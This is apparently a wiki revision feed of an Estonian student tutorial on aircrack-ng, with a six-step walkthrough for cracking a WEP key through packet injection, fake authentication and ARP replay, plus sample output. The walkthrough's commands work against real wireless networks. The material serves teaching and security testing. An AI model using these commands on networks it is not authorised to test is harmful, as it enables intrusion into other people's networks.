 ath0            Atheros         madwifi-ng VAP (parent: wifi0) (monitor mode enabled)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pane tähele! “ath0” liides on märgitud nüüd kuulamisrežiimi.&lt;br /&gt;
&lt;br /&gt;
Veendumaks, et liides on korrektselt üles seatud:&lt;br /&gt;
&amp;lt;pre&amp;gt;iwconfig&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;lo        no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
wifi0     no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
eth0      no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
ath0      IEEE 802.11g  ESSID:&amp;quot;&amp;quot;  Nickname:&amp;quot;&amp;quot;&lt;br /&gt;
       Mode:Monitor  Frequency:2.452 GHz  Access Point: 00:0F:B5:88:AC:82   &lt;br /&gt;
       Bit Rate:0 kb/s   Tx-Power:18 dBm   Sensitivity=0/3  &lt;br /&gt;
       Retry:off   RTS thr:off   Fragment thr:off&lt;br /&gt;
       Encryption key:off&lt;br /&gt;
       Power Management:off&lt;br /&gt;
       Link Quality=0/94  Signal level=-95 dBm  Noise level=-95 dBm&lt;br /&gt;
       Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0&lt;br /&gt;
       Tx excessive retries:0  Invalid misc:0   Missed beacon:0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Kontrolli: Mode = Monitor; 2.452GHz = Channel 9; aircrack-ng&#039;d jooksutava arvuti MAC, mis on nähtav vaid madwifi-ng draiverite puhul, muidu mitte!&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 2: Testime „süstimise“ suutlikkust pääsupunktile&#039;&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
Selle sammu eesmärgiks on selgitada välja, kas ollakse piisavalt lähedal pääsupunktile, et sinna pakette „süstida“.&lt;br /&gt;
 &lt;br /&gt;
Sisesta käsureale:&lt;br /&gt;
&amp;lt;pre&amp;gt;aireplay-ng -9 -e teddy -a 00:14:6C:7E:40:80  ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;Selgituseks:&lt;br /&gt;
-9 - “süstimise” test&lt;br /&gt;
-e teddy – raadiovõrgu nimi&lt;br /&gt;
-a 00:14:6C:7E:40:80 – pääsupunkti MAC aadress&lt;br /&gt;
ath0 – raadiovõrgu liides&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;09:23:35  Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9&lt;br /&gt;
09:23:35  Trying broadcast probe requests...&lt;br /&gt;
09:23:35  Injection is working!&lt;br /&gt;
09:23:37  Found 1 AP &lt;br /&gt;
&lt;br /&gt;
09:23:37  Trying directed probe requests...&lt;br /&gt;
09:23:37  00:14:6C:7E:40:80 - channel: 9 - &#039;teddy&#039;&lt;br /&gt;
09:23:39  Ping (min/avg/max): 1.827ms/68.145ms/111.610ms Power: 33.73&lt;br /&gt;
09:23:39  30/30: 100%&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pane tähele! Viimane rida on eriti tähtis! Ideaalis peaks tulemus olema 100% või mõni muu väga kõrge protsent. Kui protsent on madal, siis ollakse pääsupunktist kas liiga kaugel või sellele liigagi lähedal. 0% märgib “süstimise” mitte toimimist ning sellisel juhul tuleks paigata (ingl. k patch) või kasutada hoopis muid draivereid.  &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 3: Avada airodump-ng pakettide püüdmiseks&#039;&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
Ava uus konsooliaken ja sisesta: &lt;br /&gt;
&amp;lt;pre&amp;gt;airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w output ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;Selgituseks:&lt;br /&gt;
-c 9 – raadiovõrgu kanal&lt;br /&gt;
--bssid 00:14:6C:7E:40:80 – pääsupunkti MAC aadressi ees olev võti ütleb, et antud aadress ei ole seotud ühegi pääsupunktiga, vaid otsib üht, kuhu ühendud&lt;br /&gt;
-w output – võtmele järgneb faili nime prefiks, mis edaspidi sisaldab IV-sid&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Hiljem, mil “süstimine” leiab aset, võib ekraanilt lugeda midagi sellist:&lt;br /&gt;
&amp;lt;pre&amp;gt;CH  9 ][ Elapsed: 8 mins ][ 2007-03-21 19:25 &lt;br /&gt;
                                                                                                              &lt;br /&gt;
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                            &lt;br /&gt;
 00:14:6C:7E:40:80   42 100     5240   178307  338   9  54  WEP  WEP         teddy                           &lt;br /&gt;
                                                                                                            &lt;br /&gt;
 BSSID              STATION            PWR  Lost  Packets  Probes                                             &lt;br /&gt;
                                                                                                            &lt;br /&gt;
 00:14:6C:7E:40:80  00:0F:B5:88:AC:82   42     0   183782  &amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 4: Kasutame aireplay-ng&#039;d vale autentimise läbiviimiseks pääsupunktiga&#039;&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
Ava uus konsooliaken ja sisesta:&lt;br /&gt;
&amp;lt;pre&amp;gt;aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;Selgitus:&lt;br /&gt;
-1 – võlts autentimine&lt;br /&gt;
0 – kordusühendus(t)e aeg sekundites&lt;br /&gt;
-h 00:0F:B5:88:AC:82 – meie võrgukaardi MAC aadress&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Õnnestumise korral on tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;18:18:20  Sending Authentication Request&lt;br /&gt;
18:18:20  Authentication successful&lt;br /&gt;
18:18:20  Sending Association Request&lt;br /&gt;
18:18:20  Association successful :-)&lt;br /&gt;
Ebaõnnestumise korral on tulemus: &lt;br /&gt;
8:28:02  Sending Authentication Request&lt;br /&gt;
18:28:02  Authentication successful&lt;br /&gt;
18:28:02  Sending Association Request&lt;br /&gt;
18:28:02  Association successful :-)&lt;br /&gt;
18:28:02  Got a deauthentication packet!&lt;br /&gt;
18:28:05  Sending Authentication Request&lt;br /&gt;
18:28:05  Authentication successful&lt;br /&gt;
18:28:05  Sending Association Request&lt;br /&gt;
18:28:10  Sending Authentication Request&lt;br /&gt;
18:28:10  Authentication successful&lt;br /&gt;
18:28:10  Sending Association Request&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 5: Ava aireplay-ng ARP päringute kordusrežiimis&#039;&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
Järgnevalt kasutatakse aireplay-ng’d meetodil, kus on võimalik kuulata ARP päringuid, et neid siis võrku tagasi „süstida“. &lt;br /&gt;
&lt;br /&gt;
Ava uus konsooliaken ja sisesta:&lt;br /&gt;
&amp;lt;pre&amp;gt;aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;Saving ARP requests in replay_arp-0321-191525.cap&lt;br /&gt;
You should also start airodump-ng to capture replies.&lt;br /&gt;
Read 629399 packets (got 316283 ARP requests), sent 210955 packets...&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 6: Ava aircrack-ng salasõna lahti murdmiseks&#039;&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
Viimaks pannakse tööle aircrack-ng, et saada kätte salasõna kogutud IV-de põhjal. &lt;br /&gt;
&lt;br /&gt;
Ava uus konsooliaken: &lt;br /&gt;
&amp;lt;pre&amp;gt;aircrack-ng -b 00:14:6C:7E:40:80 output*.cap&amp;lt;/pre&amp;gt;&lt;br /&gt;
&#039;&#039;&lt;br /&gt;
Selgitus:&lt;br /&gt;
-b 00:14:6C:7E:40:80 – MAC aadress märgib pääsupunkti, mis meile huvi pakub&lt;br /&gt;
output*.cap – märgib kõiki faile, mis algavad sõnaga “output” ning lõppevad “.cap”&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;                             [00:03:06] Tested 674449 keys (got 96610 IVs)&lt;br /&gt;
&lt;br /&gt;
KB    depth   byte(vote)&lt;br /&gt;
 0    0/  9   12(  15) F9(  15) 47(  12) F7(  12) FE(  12) 1B(   5) 77(   5) A5(   3) F6(   3) 03(   0) &lt;br /&gt;
 1    0/  8   34(  61) E8(  27) E0(  24) 06(  18) 3B(  16) 4E(  15) E1(  15) 2D(  13) 89(  12) E4(  12) &lt;br /&gt;
 2    0/  2   56(  87) A6(  63) 15(  17) 02(  15) 6B(  15) E0(  15) AB(  13) 0E(  10) 17(  10) 27(  10) &lt;br /&gt;
 3    1/  5   78(  43) 1A(  20) 9B(  20) 4B(  17) 4A(  16) 2B(  15) 4D(  15) 58(  15) 6A(  15) 7C(  15) &lt;br /&gt;
&lt;br /&gt;
                      KEY FOUND! [ 12:34:56:78:90 ] &lt;br /&gt;
     Probability: 100%&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Kokkuvõte=&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=Kasutatud kirjandus=&lt;br /&gt;
&amp;lt;references/&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Autor=&lt;br /&gt;
&lt;br /&gt;
Kelly Tragel [ISa 21]&amp;lt;br&amp;gt;&lt;br /&gt;
Viimati muudetud: 25.05.2015&lt;br /&gt;
&lt;br /&gt;
=Versioonide ajalugu=&lt;br /&gt;
&lt;br /&gt;
&amp;lt;table border=&amp;quot;1&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
&amp;lt;th&amp;gt; Kuupäev &amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;th&amp;gt; Versioon &amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt; 25.05.2015 &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt; 1.0 &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;/div&gt;</summary>
		<author><name>Ktragel</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Aircrack&amp;diff=89288</id>
		<title>Aircrack</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Aircrack&amp;diff=89288"/>
		<updated>2015-05-25T19:16:42Z</updated>

		<summary type="html">&lt;p&gt;Ktragel: /* Versioonide ajalugu */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Sissejuhatus=&lt;br /&gt;
Käesoleva artikli eesmärgiks on tutvustada Aircrack-ng komplekti (sisaldab üle kümne väiksema tööriista) kuuluvat tööriista aircrack-ng. Artikkel hõlmab endas aircrack-ng installatsiooni- ja kasutusjuhendit. &lt;br /&gt;
&lt;br /&gt;
=Eeldused=&lt;br /&gt;
&lt;br /&gt;
* Elementaarne käsurea kasutamisoskus&lt;br /&gt;
* Teadmised WiFi, WEP, WPA/WPA2 kohta&lt;br /&gt;
* Võrgus vähemalt 1 aktiivne klient&lt;br /&gt;
* Ollakse füüsiliselt piisavalt lähedal pääsupunktile (ingl. k Access Point)&lt;br /&gt;
* Soovituslik on toimetada mõne Linuxi distributsiooni peal (ehkki aircrack-ng on konfigureeritav erinevatel platvormidel, ei pruugi kõik funktsionaalsused mitte Linux süsteemidel töötada)&lt;br /&gt;
* aircrack-ng tööle saamise eelduseks on “heaks kiidetud” WiFi adapter (rohkem infot: [http://aircrack-ng.org/doku.php?id=compatible_cards siit] ja [http://aircrack-ng.org/doku.php?id=compatibility_drivers siit])&lt;br /&gt;
&lt;br /&gt;
WiFi adapteri vaatamine:&lt;br /&gt;
&amp;lt;pre&amp;gt;lspci -nn | grep Network&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
või rohkema informatsiooni saamiseks:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;lshw -class network&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemuseks saame midagi sarnast:&lt;br /&gt;
&amp;lt;pre&amp;gt;02:00.0 Network controller [0280]: Intel Corporation Centrino Advanced-N 6205 [Taylor Peak] [8086:0082] (rev 34)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
või &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;*-network&lt;br /&gt;
       description: Wireless interface&lt;br /&gt;
       product: Centrino Advanced-N 6205 [Taylor Peak]&lt;br /&gt;
       vendor: Intel Corporation&lt;br /&gt;
       physical id: 0&lt;br /&gt;
       bus info: pci@0000:02:00.0&lt;br /&gt;
       logical name: wlan0&lt;br /&gt;
       version: 34&lt;br /&gt;
       serial: 6c:88:14:1d:29:c4&lt;br /&gt;
       width: 64 bits&lt;br /&gt;
       clock: 33MHz&lt;br /&gt;
       capabilities: pm msi pciexpress bus_master cap_list ethernet physical wireless&lt;br /&gt;
       configuration: broadcast=yes driver=iwlwifi driverversion=3.19.0-18-generic firmware=18.168.6.1 ip=192.168.1.93 latency=0 link=yes multicast=yes wireless=IEEE 802.11abgn&lt;br /&gt;
       resources: irq:32 memory:f7d00000-f7d01fff&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;&amp;lt;!-- Warning style viksitud ArchWikist --&amp;gt;div style=&amp;quot;padding: 5px; margin: 0.50em 0; background-color: #FFDDDD; border: thin solid #DDBBBB; overflow: hidden;&amp;quot;&amp;gt;&#039;&#039;&#039;Pane tähele! &#039;&#039;&#039;Antud juhend on koostatud kasutades Ubuntu 15.04 (Vivid Vervet) ja Aircrack-ng 1.2 RC2 versioone. &amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Üldkirjeldus=&lt;br /&gt;
&lt;br /&gt;
aircrack-ng on 802.11 WEP ja WPA/WPA2-PSK võtmete lahtimurdmise programm. Seda tuleb kasutada kombineerides ka teisi Aircrack-ng komplekti kuuluvaid mooduleid/tööriistu:&lt;br /&gt;
* airodump-ng - programm pakettide püüdmiseks &lt;br /&gt;
* aireplay-ng - programm pakettide „süstimiseks“ &lt;br /&gt;
* aircrack-ng - staatiline WEP ja WPA/WPA2-PSK võtmete lahti murdija&lt;br /&gt;
* airdecap-ng - WEP/WPA/WPA2 püütud failide dekrüpteerimiseks &lt;br /&gt;
&lt;br /&gt;
==Süntaks==&lt;br /&gt;
&lt;br /&gt;
aircrack-ng süntaks näeb välja järgmine:&lt;br /&gt;
&amp;lt;pre&amp;gt;aircrack-ng [võti] &amp;lt;püütud fail(id)&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nimekirja võtmetele leiab [http://www.aircrack-ng.org/doku.php?id=aircrack-ng&amp;amp;DokuWiki=10da6035d1e79b0fb572490ff22d4b53#usage SIIT!]&lt;br /&gt;
&lt;br /&gt;
=Installeerimine=&lt;br /&gt;
&lt;br /&gt;
Uuendame repositooriumi:&lt;br /&gt;
&amp;lt;pre&amp;gt;sudo apt-get update&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Kasutame apt-i utiliiti, et paigaldada Aircrack-ng komplekt:&lt;br /&gt;
&amp;lt;pre&amp;gt;sudo apt-get install aircrack-ng&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=WEP võtme murdmine=&lt;br /&gt;
&lt;br /&gt;
Alustuseks on soovitav üles märkida järgmised andmed, sest neid läheb meil ka edaspidi vaja: &lt;br /&gt;
* Arvuti MAC aadress, mis jooksutab aircrack-ng&#039;d: 00:0F:B5:88:AC:82&lt;br /&gt;
* BSSID (pääsupunkti MAC aadress): 00:14:6C:7E:40:80&lt;br /&gt;
* ESSID (võrgu nimi): teddy&lt;br /&gt;
* Pääsupunkti kanal: 9&lt;br /&gt;
* Raadiovõrgu liides (ingl. k Wireless interface): ath0&lt;br /&gt;
&lt;br /&gt;
==Eesmärk==&lt;br /&gt;
Eesmärgiks on püüda kinni võimalikult palju initsialiseerimise vektoreid ehk IV-sid (ingl. k initialization vectors). Normaalse võrguliikluse (ingl. k network traffic) juures ei genereerita neid tavaliselt just väga kiiresti. Kuna keegi ei suuda meist aga pikalt kannatlik olla, siis kasutatakse siinkohal protsessi kiirendamiseks „süstimise“ (ingl. k injection) tehnikat. Sellisel juhul saadab pääsupunkt valitud pakette massiliselt uuesti ja uuesti, et oleks võimalik kinni püüda palju IV-sid võimalikult lühikese aja jooksul. Kui ka see on õnnestunud, siis saame kogutud IV-sid kasutada WEP võtme lahti murdmiseks.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
==Lühikesed tegevussammud==&lt;br /&gt;
Lühidalt sammudest, mida tegema asume:&lt;br /&gt;
1. Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi (ingl. k monitor mode)&amp;lt;br&amp;gt;&lt;br /&gt;
2. Testime „süstimise“ suutlikkust pääsupunktile &amp;lt;br&amp;gt;&lt;br /&gt;
3. Panna tööle airodump-ng pääsupunkti kanalil koos BSSID filtriga, et koguda IV-sid&amp;lt;br&amp;gt;&lt;br /&gt;
4. Kasutame aireplay-ng&#039;d vale autentimise läbiviimiseks pääsupunktiga &amp;lt;br&amp;gt;&lt;br /&gt;
5. Panna tööle aireplay-ng ARP päringute (ingl. k request) kordusrežiimis (ingl. k replay mode), et “süstida” pakette&amp;lt;br&amp;gt;&lt;br /&gt;
6. Kasutada aircrack-ng&#039;d salasõna lahti murdmiseks, kasutades seejuures ära kogutud IV-sid&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Näide WEP võtme lahti murdmise protsessist==&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Samm1: Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi&#039;&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
Esmalt tuleb avada konsooli aken ning WiFi võrgukaart seadistada kuulamisrežiimi seisundisse. Selles režiimis kuulab kaart igat paketti (tavaliselt kuulab kaart vaid meile adresseeritud pakette). Igat paketti kuulates on võimalik valida välja mõned neist, et viia läbi „süstimine“.&lt;br /&gt;
 &lt;br /&gt;
Peata ath0 liidese:&lt;br /&gt;
&amp;lt;pre&amp;gt;airmon-ng stop ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;Interface       Chipset         Driver&lt;br /&gt;
&lt;br /&gt;
wifi0           Atheros         madwifi-ng&lt;br /&gt;
ath0            Atheros         madwifi-ng VAP (parent: wifi0) (VAP destroyed)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Kontrolli, kas kõik athX liidesed on ikka suletud:&lt;br /&gt;
&amp;lt;pre&amp;gt;iwconfig&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;lo        no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
eth0      no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
wifi0     no wireless extensions.&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Kui siiski vastusest tuli välja veel mõni athX liides, siis tuleb ka need ükshaaval &#039;&#039;&#039;airmon-ng stop athX&#039;&#039;&#039; käsuga sulgeda.&lt;br /&gt;
&lt;br /&gt;
Seadista võrgukaart 9-ndale kanalile kuulamisrežiimi:&lt;br /&gt;
&amp;lt;pre&amp;gt;airmon-ng start wifi0 9&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pane tähele! Eelmises käsus kasutasime “wifi0”-i varasemalt üles märgitud võrguliidese “ath0” asemel, seda seetõttu, et kasutuses on madwifi-ng draiver (nähtav airmon-ng stop ath0 käsu tulemuses). Juhul, kui kasutusel on mõni muu draiver, kasuta raaiovõrgu liidese nime, näiteks “wlan0” või “rausb0”.&lt;br /&gt;
&lt;br /&gt;
Tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt; Interface       Chipset         Driver&lt;br /&gt;
 &lt;br /&gt;
 wifi0           Atheros         madwifi-ng&lt;br /&gt;
 ath0            Atheros         madwifi-ng VAP (parent: wifi0) (monitor mode enabled)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pane tähele! “ath0” liides on märgitud nüüd kuulamisrežiimi.&lt;br /&gt;
&lt;br /&gt;
Veendumaks, et liides on korrektselt üles seatud:&lt;br /&gt;
&amp;lt;pre&amp;gt;iwconfig&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;lo        no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
wifi0     no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
eth0      no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
ath0      IEEE 802.11g  ESSID:&amp;quot;&amp;quot;  Nickname:&amp;quot;&amp;quot;&lt;br /&gt;
       Mode:Monitor  Frequency:2.452 GHz  Access Point: 00:0F:B5:88:AC:82   &lt;br /&gt;
       Bit Rate:0 kb/s   Tx-Power:18 dBm   Sensitivity=0/3  &lt;br /&gt;
       Retry:off   RTS thr:off   Fragment thr:off&lt;br /&gt;
       Encryption key:off&lt;br /&gt;
       Power Management:off&lt;br /&gt;
       Link Quality=0/94  Signal level=-95 dBm  Noise level=-95 dBm&lt;br /&gt;
       Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0&lt;br /&gt;
       Tx excessive retries:0  Invalid misc:0   Missed beacon:0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Kontrolli: Mode = Monitor; 2.452GHz = Channel 9; aircrack-ng&#039;d jooksutava arvuti MAC, mis on nähtav vaid madwifi-ng draiverite puhul, muidu mitte!&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 2: Testime „süstimise“ suutlikkust pääsupunktile&#039;&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
Selle sammu eesmärgiks on selgitada välja, kas ollakse piisavalt lähedal pääsupunktile, et sinna pakette „süstida“.&lt;br /&gt;
 &lt;br /&gt;
Sisesta käsureale:&lt;br /&gt;
&amp;lt;pre&amp;gt;aireplay-ng -9 -e teddy -a 00:14:6C:7E:40:80  ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;Selgituseks:&lt;br /&gt;
-9 - “süstimise” test&lt;br /&gt;
-e teddy – raadiovõrgu nimi&lt;br /&gt;
-a 00:14:6C:7E:40:80 – pääsupunkti MAC aadress&lt;br /&gt;
ath0 – raadiovõrgu liides&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;09:23:35  Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9&lt;br /&gt;
09:23:35  Trying broadcast probe requests...&lt;br /&gt;
09:23:35  Injection is working!&lt;br /&gt;
09:23:37  Found 1 AP &lt;br /&gt;
&lt;br /&gt;
09:23:37  Trying directed probe requests...&lt;br /&gt;
09:23:37  00:14:6C:7E:40:80 - channel: 9 - &#039;teddy&#039;&lt;br /&gt;
09:23:39  Ping (min/avg/max): 1.827ms/68.145ms/111.610ms Power: 33.73&lt;br /&gt;
09:23:39  30/30: 100%&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pane tähele! Viimane rida on eriti tähtis! Ideaalis peaks tulemus olema 100% või mõni muu väga kõrge protsent. Kui protsent on madal, siis ollakse pääsupunktist kas liiga kaugel või sellele liigagi lähedal. 0% märgib “süstimise” mitte toimimist ning sellisel juhul tuleks paigata (ingl. k patch) või kasutada hoopis muid draivereid.  &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 3: Avada airodump-ng pakettide püüdmiseks&#039;&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
Ava uus konsooliaken ja sisesta: &lt;br /&gt;
&amp;lt;pre&amp;gt;airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w output ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;Selgituseks:&lt;br /&gt;
-c 9 – raadiovõrgu kanal&lt;br /&gt;
--bssid 00:14:6C:7E:40:80 – pääsupunkti MAC aadressi ees olev võti ütleb, et antud aadress ei ole seotud ühegi pääsupunktiga, vaid otsib üht, kuhu ühendud&lt;br /&gt;
-w output – võtmele järgneb faili nime prefiks, mis edaspidi sisaldab IV-sid&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Hiljem, mil “süstimine” leiab aset, võib ekraanilt lugeda midagi sellist:&lt;br /&gt;
&amp;lt;pre&amp;gt;CH  9 ][ Elapsed: 8 mins ][ 2007-03-21 19:25 &lt;br /&gt;
                                                                                                              &lt;br /&gt;
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                            &lt;br /&gt;
 00:14:6C:7E:40:80   42 100     5240   178307  338   9  54  WEP  WEP         teddy                           &lt;br /&gt;
                                                                                                            &lt;br /&gt;
 BSSID              STATION            PWR  Lost  Packets  Probes                                             &lt;br /&gt;
                                                                                                            &lt;br /&gt;
 00:14:6C:7E:40:80  00:0F:B5:88:AC:82   42     0   183782  &amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 4: Kasutame aireplay-ng&#039;d vale autentimise läbiviimiseks pääsupunktiga&#039;&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
Ava uus konsooliaken ja sisesta:&lt;br /&gt;
&amp;lt;pre&amp;gt;aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;Selgitus:&lt;br /&gt;
-1 – võlts autentimine&lt;br /&gt;
0 – kordusühendus(t)e aeg sekundites&lt;br /&gt;
-h 00:0F:B5:88:AC:82 – meie võrgukaardi MAC aadress&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Õnnestumise korral on tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;18:18:20  Sending Authentication Request&lt;br /&gt;
18:18:20  Authentication successful&lt;br /&gt;
18:18:20  Sending Association Request&lt;br /&gt;
18:18:20  Association successful :-)&lt;br /&gt;
Ebaõnnestumise korral on tulemus: &lt;br /&gt;
8:28:02  Sending Authentication Request&lt;br /&gt;
18:28:02  Authentication successful&lt;br /&gt;
18:28:02  Sending Association Request&lt;br /&gt;
18:28:02  Association successful :-)&lt;br /&gt;
18:28:02  Got a deauthentication packet!&lt;br /&gt;
18:28:05  Sending Authentication Request&lt;br /&gt;
18:28:05  Authentication successful&lt;br /&gt;
18:28:05  Sending Association Request&lt;br /&gt;
18:28:10  Sending Authentication Request&lt;br /&gt;
18:28:10  Authentication successful&lt;br /&gt;
18:28:10  Sending Association Request&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 5: Ava aireplay-ng ARP päringute kordusrežiimis&#039;&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
Järgnevalt kasutatakse aireplay-ng’d meetodil, kus on võimalik kuulata ARP päringuid, et neid siis võrku tagasi „süstida“. &lt;br /&gt;
&lt;br /&gt;
Ava uus konsooliaken ja sisesta:&lt;br /&gt;
&amp;lt;pre&amp;gt;aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;Saving ARP requests in replay_arp-0321-191525.cap&lt;br /&gt;
You should also start airodump-ng to capture replies.&lt;br /&gt;
